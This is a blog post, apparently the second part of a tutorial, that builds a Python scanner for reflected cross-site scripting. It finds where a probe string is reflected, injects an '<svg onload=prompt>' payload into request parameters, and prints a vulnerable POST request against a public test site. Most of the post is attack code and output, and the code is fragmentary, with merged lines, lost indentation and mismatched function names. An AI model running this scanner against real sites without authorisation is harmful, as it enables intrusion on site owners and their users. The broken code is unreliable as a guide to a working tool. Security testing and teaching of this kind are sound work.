Writing a scanner to find reflected XSS vulnerabilities — Part 2

pip3 install lxml
from lxml import htmlstring = "<html><body><h1>teyascan</h1></body></html>"
search_string = "teyascan"
page_html_tree = html.fromstring(string)
xpath = '//*[contains(text(),\'' + search_string + '\')]'
n = page_html_tree.xpath(xpath)
if len(n):
print("INPUT IS REFLECTED BACK INSIDE HTML TAG CONTEXT")
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
INPUT IS REFLECTED BACK INSIDE HTML TAG CONTEXT
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
{'payload': 'teyascan', 'contexts': [{'type': 'text', 'count': 1}]}
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>
with open("requests.txt", "rb") as f:
parser = RequestParser(f.read())
i_p = GetInsertionPoints(parser.request)

for request in i_p.requests:
response = send_request(request, "http")
if "teyascan" in response.text:
print("probe reflection found in "+request.insertion)
contexts = ContextAnalyzer.get_contexts(response.text, "teyascan")
final_payloads = []
for context in contexts["contexts"]:
print(context)
payloads = payload_generator(context['type'])
final_payloads.extend(payloads)
print(final_payloads)
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
{'type': 'htmltag', 'count': 1}
[{'payload': '<svg onload=prompt`812132`>', 'find': '//svg[@onload[contains(.,812132)]]'}]
dup = copy.deepcopy(request)
def replace(request, string, payload):

for k, v in request.headers.items():
k.replace(string, payload)
v.replace(string, payload)

for k, v in request.params.items():
request.params[k] = request.params[k].replace(string, payload)
for k, v in self.data.items():
request.data[k] = request.data[k].replace(string, payload)
with open("requests.txt", "rb") as f:
parser = RequestParser(f.read())
i_p = GetInsertionPoints(parser.request)

for request in i_p.requests:
response = send_request(request, "http")
if "teyascan" in response.text:
print("probe reflection found in "+request.insertion)
contexts = ContextAnalyzer.get_contexts(response.text, "teyascan")
for context in contexts["contexts"]:
print(context)
payloads = payloadGenerator(context['type'])
for payload in payloads:
dup = copy.deepcopy(request)
dup.replace("teyascan", payload['payload'])
response = send_request(dup, "http")
page_html_tree = html.fromstring(response.text)
count = page_html_tree.xpath(payload['find'])
if len(count):
print("request vulnerable")
print(dup.headers)
http = MakeRawHTTP(dup)
print(http.rawRequest)
(xss_env) C:\Users\hungrysoul\Downloads\teya\teya>python test.py
probe reflection found in searchFor
VULNERABLE TO XSS
POST /search.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://testphp.vulnweb.com
Connection: close
Referer: http://testphp.vulnweb.com/search.php?test=query
Upgrade-Insecure-Requests: 1
searchFor=asdas <svg onload=prompt`812132`>&goButton=go&

TADAAA! We have successfully automated finding of XSS

  • Scrapping URLs from Wayback and scanning for XSS
  • Scrapping Google with dorks and scanning for XSS

--

--

--

Python Dev, Part time Bug Bounty Hunter & a Full time entrepreneur.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Monitoring Mobile Game App Performance

“Root Cause Analysis” — There is no such thing as “the root cause”

Can Meilisearch replace TicketSwap’s Elasticsearch powered events and artists search?

Simple server-less public API’s with AWS API Gateway, Lambda and DynamoDB

5 Simple Tips for Efficient Web Crawling using Selenium Python

Just published a Capacitor Plugin for Paystack 🎉!

Web Architecture

How can we use `default_factory` in a Pydantic field?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Hungrysoul

Hungrysoul

Python Dev, Part time Bug Bounty Hunter & a Full time entrepreneur.

More from Medium

Hack The Box — Lame Writeup

Paper - HackTheBox [Writeup]

A Complete Guide to Web Application Penetration Testing: Techniques, Methods, and Tools

SQL injection UNION attack, retrieving multiple values in a single column